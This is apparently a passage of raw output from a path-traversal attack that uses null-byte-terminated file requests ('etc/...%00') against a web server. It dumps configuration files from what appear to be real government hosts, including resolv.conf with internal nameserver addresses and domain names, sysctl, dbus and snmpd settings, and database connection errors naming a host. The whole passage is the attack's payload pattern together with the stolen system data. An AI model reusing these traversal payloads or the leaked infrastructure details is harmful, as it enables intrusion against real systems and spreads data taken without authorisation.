  1824. PRUNEFS = "9p afs anon_inodefs auto autofs bdev binfmt_misc cgroup cifs coda configfs cpuset debugfs devpts ecryptfs exofs fuse fusectl gfs gfs2 hugetlbfs inotifyfs iso9660 jffs2 lustre mqueue ncpfs nfs nfs4 nfsd pipefs proc ramfs rootfs rpc_pipefs securityfs selinuxfs sfs sockfs sysfs tmpfs ubifs udf usbfs"
  1825. PRUNENAMES = ".git .hg .svn"
  1826. PRUNEPATHS = "/afs /media /net /sfs /tmp /udev /var/cache/ccache /var/spool/cups /var/spool/squid /var/tmp"
  1827. <b>Query Used: etc/kernel-pkg.conf%00</b>.<b>Query Used: etc/samba/dhcp.conf%00</b>Array
  1828. (
  1829. [0] => Could not connect to host server: mysqlread.md.nids.noaa.gov
  1830. Too many connections
  1831. )
  1832. <b>Query Used: etc/samba/smb.conf%00</b>.<b>Query Used: etc/ltrace.conf%00</b>.<b>Query Used: etc/bonobo-activation/bonobo-activation-config.xml%00</b>.<b>Query Used: etc/sysctl.conf%00</b># Kernel sysctl configuration file for Red Hat Linux
  1833. #
  1834. # For binary values, 0 is disabled, 1 is enabled. See sysctl(8) and
  1835. # sysctl.conf(5) for more details.
  1836.  
  1837. # Controls IP packet forwarding
  1838. net.ipv4.ip_forward = 0
  1839.  
  1840. # Controls source route verification
  1841. net.ipv4.conf.default.rp_filter = 1
  1842.  
  1843. # Do not accept source routing
  1844. net.ipv4.conf.default.accept_source_route = 0
  1845.  
  1846. # Controls the System Request debugging functionality of the kernel
  1847. kernel.sysrq = 0
  1848.  
  1849. # Controls whether core dumps will append the PID to the core filename.
  1850. # Useful for debugging multi-threaded applications.
  1851. kernel.core_uses_pid = 1
  1852.  
  1853. # Controls the use of TCP syncookies
  1854. net.ipv4.tcp_syncookies = 1
  1855.  
  1856. # Disable netfilter on bridges.
  1857. net.bridge.bridge-nf-call-ip6tables = 0
  1858. net.bridge.bridge-nf-call-iptables = 0
  1859. net.bridge.bridge-nf-call-arptables = 0
  1860.  
  1861. # Controls the maximum size of a message, in bytes
  1862. kernel.msgmnb = 65536
  1863.  
  1864. # Controls the default maxmimum size of a mesage queue
  1865. kernel.msgmax = 65536
  1866.  
  1867. # Controls the maximum shared segment size, in bytes
  1868. kernel.shmmax = 68719476736
  1869.  
  1870. # Controls the maximum number of shared memory segments, in pages
  1871. kernel.shmall = 4294967296
  1872.  
  1873. #Arp fix for LVS
  1874. net.ipv4.conf.lo.arp_ignore = 1
  1875. net.ipv4.conf.lo.arp_announce = 2
  1876. net.ipv4.conf.all.arp_ignore = 1
  1877. net.ipv4.conf.all.arp_announce = 2
  1878. <b>Query Used: etc/mono/config%00</b>.<b>Query Used: etc/mono/2.0/machine.config%00</b>.<b>Query Used: etc/mono/2.0/web.config%00</b>.<b>Query Used: etc/mono/1.0/machine.config%00</b>.<b>Query Used: etc/sensors.conf%00</b>.<b>Query Used: etc/X11/xorg.conf-vesa%00</b>.<b>Query Used: etc/X11/xorg.conf.BeforeVMwareToolsInstall%00</b>.<b>Query Used: etc/X11/xorg.conf%00</b>.<b>Query Used: etc/X11/xorg.conf-vmware%00</b>.<b>Query Used: etc/X11/xorg.conf.orig%00</b>.<b>Query Used: etc/smi.conf%00</b>.<b>Query Used: etc/postgresql-common/autovacuum.conf%00</b>.<b>Query Used: etc/python/debian_config%00</b>.<b>Query Used: etc/hdparm.conf%00</b>.<b>Query Used: etc/discover.conf.d%00</b>.<b>Query Used: etc/discover.conf.d/00discover%00</b>.<b>Query Used: etc/casper.conf%00</b>.<b>Query Used: etc/discover-modprobe.conf%00</b>.<b>Query Used: etc/updatedb.conf.BeforeVMwareToolsInstall%00</b>.<b>Query Used: etc/apt/apt.conf.d%00</b>.<b>Query Used: etc/apt/apt.conf.d/00trustcdrom%00</b>.<b>Query Used: etc/apt/apt.conf.d/70debconf%00</b>.<b>Query Used: etc/apt/apt.conf.d/05aptitude%00</b>.<b>Query Used: etc/apt/apt.conf.d/50unattended-upgrades%00</b>.<b>Query Used: etc/apt/apt.conf.d/01ubuntu%00</b>.<b>Query Used: etc/apt/apt.conf.d/01autoremove%00</b>.<b>Query Used: etc/vmware-tools/config%00</b>.<b>Query Used: etc/vmware-tools/vmware-tools-libraries.conf%00</b>.<b>Query Used: etc/vmware-tools/tpvmlp.conf%00</b>.<b>Query Used: etc/miredo/miredo.conf%00</b>.<b>Query Used: etc/miredo/miredo-server.conf%00</b>.<b>Query Used: etc/PolicyKit/PolicyKit.conf%00</b>.<b>Query Used: etc/gtk-2.0/im-multipress.conf%00</b>.<b>Query Used: etc/resolv.conf%00</b># Generated by NetworkManager
  1879. domain mo.nids.noaa.gov
  1880. search mo.nids.noaa.gov dev.nids.noaa.gov md.nids.noaa.gov nids.noaa.gov
  1881. nameserver 10.251.3.105
  1882. nameserver 10.251.2.105
  1883. nameserver 10.251.4.105
  1884. # NOTE: the libc resolver may not support more than 3 nameservers.
  1885. # The nameservers listed below may not be recognized.
  1886. nameserver 204.227.96.136
  1887. nameserver 204.227.96.137
  1888. <b>Query Used: etc/adduser.conf%00</b>.<b>Query Used: etc/subversion/config%00</b>.<b>Query Used: etc/openvpn/update-resolv-conf%00</b>.<b>Query Used: etc/cvs-pserver.conf%00</b>.<b>Query Used: etc/pear/pear.conf%00</b>.<b>Query Used: etc/dns2tcpd.conf%00</b>.<b>Query Used: etc/java-6-sun/fontconfig.properties%00</b>.<b>Query Used: etc/privoxy/config%00</b>.<b>Query Used: etc/gre.d/1.9.0.14.system.conf%00</b>.<b>Query Used: etc/gre.d/1.9.0.15.system.conf%00</b>.<b>Query Used: etc/gre.d/1.9.0.10.system.conf%00</b>.<b>Query Used: etc/logrotate.conf%00</b># see "man logrotate" for details
  1889. # rotate log files weekly
  1890. weekly
  1891.  
  1892. # keep 4 weeks worth of backlogs
  1893. rotate 4
  1894.  
  1895. # create new (empty) log files after rotating old ones
  1896. create
  1897.  
  1898. # use date as a suffix of the rotated file
  1899. dateext
  1900.  
  1901. # uncomment this if you want your log files compressed
  1902. #compress
  1903.  
  1904. # RPM packages drop log rotation information into this directory
  1905. include /etc/logrotate.d
  1906.  
  1907. # no packages own wtmp and btmp -- we'll rotate them here
  1908. /var/log/wtmp {
  1909. monthly
  1910. create 0664 root utmp
  1911. minsize 1M
  1912. rotate 1
  1913. }
  1914.  
  1915. /var/log/btmp {
  1916. missingok
  1917. monthly
  1918. create 0600 root utmp
  1919. rotate 1
  1920. }
  1921.  
  1922. # system-specific logs may be also be configured here.
  1923. <b>Query Used: etc/skel/.kde3/share/apps/kconf_update%00</b>.<b>Query Used: etc/skel/.kde3/share/apps/kconf_update/log/update.log%00</b>.<b>Query Used: etc/skel/.kde3/share/share/apps/kconf_update%00</b>.<b>Query Used: etc/skel/.kde3/share/share/apps/kconf_update/log%00</b>.<b>Query Used: etc/skel/.kde3/share/share/apps/kconf_update/log/update.log%00</b>.<b>Query Used: etc/skel/.config%00</b>.<b>Query Used: etc/skel/.config/Trolltech.conf%00</b>.<b>Query Used: etc/skel/.config/menus%00</b>.<b>Query Used: etc/skel/.config/menus/applications-kmenuedit.menu%00</b>.<b>Query Used: etc/skel/.config/user-dirs.locale%00</b>.<b>Query Used: etc/skel/.config/codef00.com%00</b>.<b>Query Used: etc/skel/.config/user-dirs.dirs%00</b>.<b>Query Used: etc/avahi/avahi-daemon.conf%00</b>.<b>Query Used: etc/dhcp3/dhcpd.conf%00</b>.<b>Query Used: etc/dhcp3/dhclient.conf%00</b>.<b>Query Used: etc/splashy/config.xml%00</b>.<b>Query Used: etc/reader.conf.old%00</b>.<b>Query Used: etc/defoma/config%00</b>.<b>Query Used: etc/defoma/config/x-ttcidfont-conf.conf2%00</b>.<b>Query Used: etc/wicd/manager-settings.conf%00</b>.<b>Query Used: etc/wicd/wireless-settings.conf%00</b>.<b>Query Used: etc/wicd/dhclient.conf.template.default%00</b>.<b>Query Used: etc/wicd/wired-settings.conf%00</b>.<b>Query Used: etc/sysctl.d/wine.sysctl.conf%00</b>.<b>Query Used: etc/sysctl.d/10-network-security.conf%00</b>.<b>Query Used: etc/sysctl.d/10-console-messages.conf%00</b>.<b>Query Used: etc/kbd/config%00</b>.<b>Query Used: etc/sysctl.d/10-process-security.conf%00</b>.<b>Query Used: etc/w3m/config%00</b>.<b>Query Used: etc/reader.conf.d%00</b>.<b>Query Used: etc/reader.conf.d/libccidtwin%00</b>.<b>Query Used: etc/reader.conf.d/0comments%00</b>.<b>Query Used: etc/reader.conf%00</b>.<b>Query Used: etc/kbd/config%00</b>.<b>Query Used: etc/dbus-1/session.conf%00</b><!-- This configuration file controls the per-user-login-session message bus.
  1924. Add a session-local.conf and edit that rather than changing this
  1925. file directly. -->
  1926.  
  1927. <!DOCTYPE busconfig PUBLIC "-//freedesktop//DTD D-Bus Bus Configuration 1.0//EN"
  1928. "http://www.freedesktop.org/standards/dbus/1.0/busconfig.dtd">
  1929. <busconfig>
  1930. <!-- Our well-known bus type, don't change this -->
  1931. <type>session</type>
  1932.  
  1933. <!-- If we fork, keep the user's original umask to avoid affecting
  1934. the behavior of child processes. -->
  1935. <keep_umask/>
  1936.  
  1937. <listen>unix:tmpdir=/tmp</listen>
  1938.  
  1939. <standard_session_servicedirs />
  1940.  
  1941. <policy context="default">
  1942. <!-- Allow everything to be sent -->
  1943. <allow send_destination="*" eavesdrop="true"/>
  1944. <!-- Allow everything to be received -->
  1945. <allow eavesdrop="true"/>
  1946. <!-- Allow anyone to own anything -->
  1947. <allow own="*"/>
  1948. </policy>
  1949.  
  1950. <!-- Config files are placed here that among other things,
  1951. further restrict the above policy for specific services. -->
  1952. <includedir>session.d</includedir>
  1953.  
  1954. <!-- This is included last so local configuration can override what's
  1955. in this standard file -->
  1956. <include ignore_missing="yes">session-local.conf</include>
  1957.  
  1958. <include if_selinux_enabled="yes" selinux_root_relative="yes">contexts/dbus_contexts</include>
  1959.  
  1960. <!-- For the session bus, override the default relatively-low limits
  1961. with essentially infinite limits, since the bus is just running
  1962. as the user anyway, using up bus resources is not something we need
  1963. to worry about. In some cases, we do set the limits lower than
  1964. "all available memory" if exceeding the limit is almost certainly a bug,
  1965. having the bus enforce a limit is nicer than a huge memory leak. But the
  1966. intent is that these limits should never be hit. -->
  1967.  
  1968. <!-- the memory limits are 1G instead of say 4G because they can't exceed 32-bit signed int max -->
  1969. <limit name="max_incoming_bytes">1000000000</limit>
  1970. <limit name="max_outgoing_bytes">1000000000</limit>
  1971. <limit name="max_message_size">1000000000</limit>
  1972. <limit name="service_start_timeout">120000</limit>
  1973. <limit name="auth_timeout">240000</limit>
  1974. <limit name="max_completed_connections">100000</limit>
  1975. <limit name="max_incomplete_connections">10000</limit>
  1976. <limit name="max_connections_per_user">100000</limit>
  1977. <limit name="max_pending_service_starts">10000</limit>
  1978. <limit name="max_names_per_connection">50000</limit>
  1979. <limit name="max_match_rules_per_connection">50000</limit>
  1980. <limit name="max_replies_per_connection">50000</limit>
  1981.  
  1982. </busconfig>
  1983. <b>Query Used: etc/dbus-1/system.conf%00</b><!-- This configuration file controls the systemwide message bus.
  1984. Add a system-local.conf and edit that rather than changing this
  1985. file directly. -->
  1986.  
  1987. <!-- Note that there are any number of ways you can hose yourself
  1988. security-wise by screwing up this file; in particular, you
  1989. probably don't want to listen on any more addresses, add any more
  1990. auth mechanisms, run as a different user, etc. -->
  1991.  
  1992. <!DOCTYPE busconfig PUBLIC "-//freedesktop//DTD D-Bus Bus Configuration 1.0//EN"
  1993. "http://www.freedesktop.org/standards/dbus/1.0/busconfig.dtd">
  1994. <busconfig>
  1995.  
  1996. <!-- Our well-known bus type, do not change this -->
  1997. <type>system</type>
  1998.  
  1999. <!-- Run as special user -->
  2000. <user>dbus</user>
  2001.  
  2002. <!-- Fork into daemon mode -->
  2003. <fork/>
  2004.  
  2005. <!-- We use system service launching using a helper -->
  2006. <standard_system_servicedirs/>
  2007.  
  2008. <!-- This is a setuid helper that is used to launch system services -->
  2009. <servicehelper>/lib64/dbus-1/dbus-daemon-launch-helper</servicehelper>
  2010.  
  2011. <!-- Write a pid file -->
  2012. <pidfile>/var/run/messagebus.pid</pidfile>
  2013.  
  2014. <!-- Enable logging to syslog -->
  2015. <syslog/>
  2016.  
  2017. <!-- Only allow socket-credentials-based authentication -->
  2018. <auth>EXTERNAL</auth>
  2019.  
  2020. <!-- Only listen on a local socket. (abstract=/path/to/socket
  2021. means use abstract namespace, don't really create filesystem
  2022. file; only Linux supports this. Use path=/whatever on other
  2023. systems.) -->
  2024. <listen>unix:path=/var/run/dbus/system_bus_socket</listen>
  2025.  
  2026. <policy context="default">
  2027. <!-- All users can connect to system bus -->
  2028. <allow user="*"/>
  2029.  
  2030. <!-- Holes must be punched in service configuration files for
  2031. name ownership and sending method calls -->
  2032. <deny own="*"/>
  2033. <deny send_type="method_call"/>
  2034.  
  2035. <!-- Signals and reply messages (method returns, errors) are allowed
  2036. by default -->
  2037. <allow send_type="signal"/>
  2038. <allow send_requested_reply="true" send_type="method_return"/>
  2039. <allow send_requested_reply="true" send_type="error"/>
  2040.  
  2041. <!-- All messages may be received by default -->
  2042. <allow receive_type="method_call"/>
  2043. <allow receive_type="method_return"/>
  2044. <allow receive_type="error"/>
  2045. <allow receive_type="signal"/>
  2046.  
  2047. <!-- Allow anyone to talk to the message bus -->
  2048. <allow send_destination="org.freedesktop.DBus"/>
  2049. <!-- But disallow some specific bus services -->
  2050. <deny send_destination="org.freedesktop.DBus"
  2051. send_interface="org.freedesktop.DBus"
  2052. send_member="UpdateActivationEnvironment"/>
  2053. </policy>
  2054.  
  2055. <!-- Config files are placed here that among other things, punch
  2056. holes in the above policy for specific services. -->
  2057. <includedir>system.d</includedir>
  2058.  
  2059. <!-- This is included last so local configuration can override what's
  2060. in this standard file -->
  2061. <include ignore_missing="yes">system-local.conf</include>
  2062.  
  2063. <include if_selinux_enabled="yes" selinux_root_relative="yes">contexts/dbus_contexts</include>
  2064.  
  2065. </busconfig>
  2066. <b>Query Used: etc/etter.conf%00</b>.<b>Query Used: etc/pm/config.d%00</b><b>Query Used: etc/pm/config.d/00sleep_module%00</b>.<b>Query Used: etc/depmod.d/ubuntu.conf%00</b>.<b>Query Used: etc/unicornscan/payloads.conf%00</b>.<b>Query Used: etc/unicornscan/unicorn.conf%00</b>.<b>Query Used: etc/unicornscan/modules.conf%00</b>.<b>Query Used: etc/console-tools/config.d%00</b>.<b>Query Used: etc/console-tools/config.d/splashy%00</b>.<b>Query Used: etc/tpvmlp.conf%00</b>.<b>Query Used: etc/mtools.conf%00</b>.<b>Query Used: etc/kernel-img.conf%00</b>.<b>Query Used: etc/ca-certificates.conf.dpkg-old%00</b>.<b>Query Used: etc/ld.so.conf%00</b>include ld.so.conf.d/*.conf
  2067. <b>Query Used: etc/conky/conky.conf%00</b>.<b>Query Used: etc/ucf.conf%00</b>.<b>Query Used: etc/rinetd.conf%00</b>.<b>Query Used: etc/e2fsck.conf%00</b>.<b>Query Used: etc/gdm/failsafeDexconf%00</b>.<b>Query Used: etc/foomatic/filter.conf%00</b>.<b>Query Used: etc/manpath.config%00</b>.<b>Query Used: etc/esound/esd.conf%00</b>.<b>Query Used: etc/tsocks.conf%00</b>.<b>Query Used: etc/stunnel/stunnel.conf%00</b>.<b>Query Used: etc/fuse.conf%00</b>.<b>Query Used: etc/uniconf.conf%00</b>.<b>Query Used: etc/syslog.conf%00</b>Array
  2068. (
  2069. [0] => Could not connect to host server: mysqlread.md.nids.noaa.gov
  2070. Too many connections
  2071. )
  2072. <b>Query Used: etc/cvs-cron.conf%00</b>.<b>Query Used: etc/snmp/snmpd.conf%00</b>###############################################################################
  2073. #
  2074. # snmpd.conf:
  2075. # An example configuration file for configuring the ucd-snmp snmpd agent.
  2076. #
  2077. ###############################################################################
  2078. #
  2079. # This file is intended to only be as a starting point. Many more
  2080. # configuration directives exist than are mentioned in this file. For
  2081. # full details, see the snmpd.conf(5) manual page.
  2082. #
  2083. # All lines beginning with a '#' are comments and are intended for you
  2084. # to read. All other lines are configuration commands for the agent.
  2085.  
  2086. ###############################################################################
  2087. # Access Control
  2088. ###############################################################################
  2089.  
  2090. # As shipped, the snmpd demon will only respond to queries on the
  2091. # system mib group until this file is replaced or modified for
  2092. # security purposes. Examples are shown below about how to increase the
  2093. # level of access.
  2094.  
  2095. # By far, the most common question I get about the agent is "why won't
  2096. # it work?", when really it should be "how do I configure the agent to
  2097. # allow me to access it?"
  2098. #
  2099. # By default, the agent responds to the "public" community for read
  2100. # only access, if run out of the box without any configuration file in
  2101. # place. The following examples show you other ways of configuring
  2102. # the agent so that you can change the community names, and give
  2103. # yourself write access to the mib tree as well.
  2104. #
  2105. # For more information, read the FAQ as well as the snmpd.conf(5)
  2106. # manual page.
  2107.  
  2108. ####
  2109. # First, map the community name "public" into a "security name"
  2110.  
  2111. # sec.name source community
  2112. com2sec notConfigUser default public
  2113.  
  2114. ####
  2115. # Second, map the security name into a group name:
  2116.  
  2117. # groupName securityModel securityName
  2118. group notConfigGroup v1 notConfigUser
  2119. group notConfigGroup v2c notConfigUser
  2120.  
  2121. ####
  2122. # Third, create a view for us to let the group have rights to:
  2123.  
  2124. # Make at least snmpwalk -v 1 localhost -c public system fast again.
  2125. # name incl/excl subtree mask(optional)
  2126. view systemview included .1.3.6.1.2.1.1
  2127. view systemview included .1.3.6.1.2.1.25.1.1
  2128.  
  2129. ####
  2130. # Finally, grant the group read-only access to the systemview view.
  2131.  
  2132. # group context sec.model sec.level prefix read write notif
  2133. access notConfigGroup "" any noauth exact systemview none none
  2134.  
  2135. # -----------------------------------------------------------------------------
  2136.  
  2137. # Here is a commented out example configuration that allows less
  2138. # restrictive access.
  2139.  
  2140. # YOU SHOULD CHANGE THE "COMMUNITY" TOKEN BELOW TO A NEW KEYWORD ONLY
  2141. # KNOWN AT YOUR SITE. YOU *MUST* CHANGE THE NETWORK TOKEN BELOW TO
  2142. # SOMETHING REFLECTING YOUR LOCAL NETWORK ADDRESS SPACE.
  2143.  
  2144. ## sec.name source community
  2145. #com2sec local localhost COMMUNITY
  2146. #com2sec mynetwork NETWORK/24 COMMUNITY
  2147.  
  2148. ## group.name sec.model sec.name
  2149. #group MyRWGroup any local
  2150. #group MyROGroup any mynetwork
  2151. #
  2152. #group MyRWGroup any otherv3user
  2153. #...
  2154.  
  2155. ## incl/excl subtree mask
  2156. #view all included .1 80
  2157.  
  2158. ## -or just the mib2 tree-
  2159.  
  2160. #view mib2 included .iso.org.dod.internet.mgmt.mib-2 fc
  2161.  
  2162.  
  2163. ## context sec.model sec.level prefix read write notif
  2164. #access MyROGroup "" any noauth 0 all none none
  2165. #access MyRWGroup "" any noauth 0 all all all
  2166.  
  2167.  
  2168. ###############################################################################
  2169. # Sample configuration to make net-snmpd RFC 1213.
  2170. # Unfortunately v1 and v2c don't allow any user based authentification, so
  2171. # opening up the default config is not an option from a security point.
  2172. #
  2173. # WARNING: If you uncomment the following lines you allow write access to your
  2174. # snmpd daemon from any source! To avoid this use different names for your
  2175. # community or split out the write access to a different community and
  2176. # restrict it to your local network.
  2177. # Also remember to comment the syslocation and syscontact parameters later as
  2178. # otherwise they are still read only (see FAQ for net-snmp).
  2179. #
  2180.  
  2181. # First, map the community name "public" into a "security name"
  2182. # sec.name source community
  2183. #com2sec notConfigUser default public
  2184.  
  2185. # Second, map the security name into a group name:
  2186. # groupName securityModel securityName
  2187. #group notConfigGroup v1 notConfigUser
  2188. #group notConfigGroup v2c notConfigUser
  2189.  
  2190. # Third, create a view for us to let the group have rights to:
  2191. # Open up the whole tree for ro, make the RFC 1213 required ones rw.
  2192. # name incl/excl subtree mask(optional)
  2193. #view roview included .1
  2194. #view rwview included system.sysContact
  2195. #view rwview included system.sysName
  2196. #view rwview included system.sysLocation
  2197. #view rwview included interfaces.ifTable.ifEntry.ifAdminStatus
  2198. #view rwview included at.atTable.atEntry.atPhysAddress
  2199. #view rwview included at.atTable.atEntry.atNetAddress
  2200. #view rwview included ip.ipForwarding
  2201. #view rwview included ip.ipDefaultTTL
  2202. #view rwview included ip.ipRouteTable.ipRouteEntry.ipRouteDest
  2203. #view rwview included ip.ipRouteTable.ipRouteEntry.ipRouteIfIndex
  2204. #view rwview included ip.ipRouteTable.ipRouteEntry.ipRouteMetric1
  2205. #view rwview included ip.ipRouteTable.ipRouteEntry.ipRouteMetric2
  2206. #view rwview included ip.ipRouteTable.ipRouteEntry.ipRouteMetric3
  2207. #view rwview included ip.ipRouteTable.ipRouteEntry.ipRouteMetric4
  2208. #view rwview included ip.ipRouteTable.ipRouteEntry.ipRouteType
  2209. #view rwview included ip.ipRouteTable.ipRouteEntry.ipRouteAge
  2210. #view rwview included ip.ipRouteTable.ipRouteEntry.ipRouteMask
  2211. #view rwview included ip.ipRouteTable.ipRouteEntry.ipRouteMetric5
  2212. #view rwview included ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaIfIndex
  2213. #view rwview included ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaPhysAddress
  2214. #view rwview included ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaNetAddress
  2215. #view rwview included ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaType
  2216. #view rwview included tcp.tcpConnTable.tcpConnEntry.tcpConnState
  2217. #view rwview included egp.egpNeighTable.egpNeighEntry.egpNeighEventTrigger
  2218. #view rwview included snmp.snmpEnableAuthenTraps
  2219.  
  2220. # Finally, grant the group read-only access to the systemview view.
  2221. # group context sec.model sec.level prefix read write notif
  2222. #access notConfigGroup "" any noauth exact roview rwview none
  2223.  
  2224.  
  2225.  
  2226. ###############################################################################
  2227. # System contact information
  2228. #
  2229.  
  2230. # It is also possible to set the sysContact and sysLocation system
  2231. # variables through the snmpd.conf file:
  2232.  
  2233. syslocation Unknown (edit /etc/snmp/snmpd.conf)
  2234. syscontact Root <root@localhost> (configure /etc/snmp/snmp.local.conf)
  2235.  
  2236. # Example output of snmpwalk:
  2237. # % snmpwalk -v 1 localhost -c public system
  2238. # system.sysDescr.0 = "SunOS name sun4c"
  2239. # system.sysObjectID.0 = OID: enterprises.ucdavis.ucdSnmpAgent.sunos4
  2240. # system.sysUpTime.0 = Timeticks: (595637548) 68 days, 22:32:55
  2241. # system.sysContact.0 = "Me <me@somewhere.org>"
  2242. # system.sysName.0 = "name"
  2243. # system.sysLocation.0 = "Right here, right now."
  2244. # system.sysServices.0 = 72
  2245.  
  2246.  
  2247. ###############################################################################
  2248. # Logging
  2249. #
  2250.  
  2251. # We do not want annoying "Connection from UDP: " messages in syslog.
  2252. # If the following option is commented out, snmpd will print each incoming
  2253. # connection, which can be useful for debugging.
  2254.  
  2255. dontLogTCPWrappersConnects yes
  2256.  
  2257. # -----------------------------------------------------------------------------
  2258.  
  2259.  
  2260. ###############################################################################
  2261. # Process checks.
  2262. #
  2263. # The following are examples of how to use the agent to check for
  2264. # processes running on the host. The syntax looks something like:
  2265. #
  2266. # proc NAME [MAX=0] [MIN=0]
  2267. #
  2268. # NAME: the name of the process to check for. It must match
  2269. # exactly (ie, http will not find httpd processes).
  2270. # MAX: the maximum number allowed to be running. Defaults to 0.
  2271. # MIN: the minimum number to be running. Defaults to 0.
  2272.  
  2273. #
  2274. # Examples (commented out by default):
  2275. #
  2276.  
  2277. # Make sure mountd is running
  2278. #proc mountd
  2279.  
  2280. # Make sure there are no more than 4 ntalkds running, but 0 is ok too.
  2281. #proc ntalkd 4
  2282.  
  2283. # Make sure at least one sendmail, but less than or equal to 10 are running.
  2284. #proc sendmail 10 1
  2285.  
  2286. # A snmpwalk of the process mib tree would look something like this:
  2287. #
  2288. # % snmpwalk -v 1 localhost -c public .1.3.6.1.4.1.2021.2
  2289. # enterprises.ucdavis.procTable.prEntry.prIndex.1 = 1
  2290. # enterprises.ucdavis.procTable.prEntry.prIndex.2 = 2
  2291. # enterprises.ucdavis.procTable.prEntry.prIndex.3 = 3
  2292. # enterprises.ucdavis.procTable.prEntry.prNames.1 = "mountd"
  2293. # enterprises.ucdavis.procTable.prEntry.prNames.2 = "ntalkd"
  2294. # enterprises.ucdavis.procTable.prEntry.prNames.3 = "sendmail"
  2295. # enterprises.ucdavis.procTable.prEntry.prMin.1 = 0
  2296. # enterprises.ucdavis.procTable.prEntry.prMin.2 = 0
  2297. # enterprises.ucdavis.procTable.prEntry.prMin.3 = 1
  2298. # enterprises.ucdavis.procTable.prEntry.prMax.1 = 0
  2299. # enterprises.ucdavis.procTable.prEntry.prMax.2 = 4
  2300. # enterprises.ucdavis.procTable.prEntry.prMax.3 = 10
  2301. # enterprises.ucdavis.procTable.prEntry.prCount.1 = 0
  2302. # enterprises.ucdavis.procTable.prEntry.prCount.2 = 0
  2303. # enterprises.ucdavis.procTable.prEntry.prCount.3 = 1
  2304. # enterprises.ucdavis.procTable.prEntry.prErrorFlag.1 = 1
  2305. # enterprises.ucdavis.procTable.prEntry.prErrorFlag.2 = 0
  2306. # enterprises.ucdavis.procTable.prEntry.prErrorFlag.3 = 0
  2307. # enterprises.ucdavis.procTable.prEntry.prErrMessage.1 = "No mountd process running."
  2308. # enterprises.ucdavis.procTable.prEntry.prErrMessage.2 = ""
  2309. # enterprises.ucdavis.procTable.prEntry.prErrMessage.3 = ""
  2310. # enterprises.ucdavis.procTable.prEntry.prErrFix.1 = 0
  2311. # enterprises.ucdavis.procTable.prEntry.prErrFix.2 = 0
  2312. # enterprises.ucdavis.procTable.prEntry.prErrFix.3 = 0
  2313. #
  2314. # Note that the errorFlag for mountd is set to 1 because one is not
  2315. # running (in this case an rpc.mountd is, but thats not good enough),
  2316. # and the ErrMessage tells you what's wrong. The configuration
  2317. # imposed in the snmpd.conf file is also shown.
  2318. #
  2319. # Special Case: When the min and max numbers are both 0, it assumes
  2320. # you want a max of infinity and a min of 1.
  2321. #
  2322.  
  2323.  
  2324. # -----------------------------------------------------------------------------
  2325.  
  2326.  
  2327. ###############################################################################
  2328. # Executables/scripts
  2329. #
  2330.  
  2331. #
  2332. # You can also have programs run by the agent that return a single
  2333. # line of output and an exit code. Here are two examples.
  2334. #
  2335. # exec NAME PROGRAM [ARGS ...]
  2336. #
  2337. # NAME: A generic name. The name must be unique for each exec statement.
  2338. # PROGRAM: The program to run. Include the path!
  2339. # ARGS: optional arguments to be passed to the program
  2340.  
  2341. # a simple hello world
  2342.  
  2343. #exec echotest /bin/echo hello world
  2344.  
  2345. # Run a shell script containing:
  2346. #
  2347. # #!/bin/sh
  2348. # echo hello world
  2349. # echo hi there
  2350. # exit 35
  2351. #
  2352. # Note: this has been specifically commented out to prevent
  2353. # accidental security holes due to someone else on your system writing
  2354. # a /tmp/shtest before you do. Uncomment to use it.
  2355. #
  2356. #exec shelltest /bin/sh /tmp/shtest
  2357.  
  2358. # Then,
  2359. # % snmpwalk -v 1 localhost -c public .1.3.6.1.4.1.2021.8
  2360. # enterprises.ucdavis.extTable.extEntry.extIndex.1 = 1
  2361. # enterprises.ucdavis.extTable.extEntry.extIndex.2 = 2
  2362. # enterprises.ucdavis.extTable.extEntry.extNames.1 = "echotest"
  2363. # enterprises.ucdavis.extTable.extEntry.extNames.2 = "shelltest"
  2364. # enterprises.ucdavis.extTable.extEntry.extCommand.1 = "/bin/echo hello world"
  2365. # enterprises.ucdavis.extTable.extEntry.extCommand.2 = "/bin/sh /tmp/shtest"
  2366. # enterprises.ucdavis.extTable.extEntry.extResult.1 = 0
  2367. # enterprises.ucdavis.extTable.extEntry.extResult.2 = 35
  2368. # enterprises.ucdavis.extTable.extEntry.extOutput.1 = "hello world."
  2369. # enterprises.ucdavis.extTable.extEntry.extOutput.2 = "hello world."
  2370. # enterprises.ucdavis.extTable.extEntry.extErrFix.1 = 0
  2371. # enterprises.ucdavis.extTable.extEntry.extErrFix.2 = 0
  2372.  
  2373. # Note that the second line of the /tmp/shtest shell script is cut
  2374. # off. Also note that the exit status of 35 was returned.
  2375.  
  2376. # -----------------------------------------------------------------------------
  2377.  
  2378.  
  2379. ###############################################################################
  2380. # disk checks
  2381. #
  2382.  
  2383. # The agent can check the amount of available disk space, and make
  2384. # sure it is above a set limit.
  2385.  
  2386. # disk PATH [MIN=100000]
  2387. #
  2388. # PATH: mount path to the disk in question.
  2389. # MIN: Disks with space below this value will have the Mib's errorFlag set.
  2390. # Default value = 100000.
  2391.  
  2392. # Check the / partition and make sure it contains at least 10 megs.
  2393.  
  2394. #disk / 10000
  2395.  
  2396. # % snmpwalk -v 1 localhost -c public .1.3.6.1.4.1.2021.9
  2397. # enterprises.ucdavis.diskTable.dskEntry.diskIndex.1 = 0
  2398. # enterprises.ucdavis.diskTable.dskEntry.diskPath.1 = "/" Hex: 2F
  2399. # enterprises.ucdavis.diskTable.dskEntry.diskDevice.1 = "/dev/dsk/c201d6s0"
  2400. # enterprises.ucdavis.diskTable.dskEntry.diskMinimum.1 = 10000
  2401. # enterprises.ucdavis.diskTable.dskEntry.diskTotal.1 = 837130
  2402. # enterprises.ucdavis.diskTable.dskEntry.diskAvail.1 = 316325
  2403. # enterprises.ucdavis.diskTable.dskEntry.diskUsed.1 = 437092
  2404. # enterprises.ucdavis.diskTable.dskEntry.diskPercent.1 = 58
  2405. # enterprises.ucdavis.diskTable.dskEntry.diskErrorFlag.1 = 0
  2406. # enterprises.ucdavis.diskTable.dskEntry.diskErrorMsg.1 = ""
  2407.  
  2408. # -----------------------------------------------------------------------------
  2409.  
  2410.  
  2411. ###############################################################################
  2412. # load average checks
  2413. #
  2414.  
  2415. # load [1MAX=12.0] [5MAX=12.0] [15MAX=12.0]
  2416. #
  2417. # 1MAX: If the 1 minute load average is above this limit at query
  2418. # time, the errorFlag will be set.
  2419. # 5MAX: Similar, but for 5 min average.
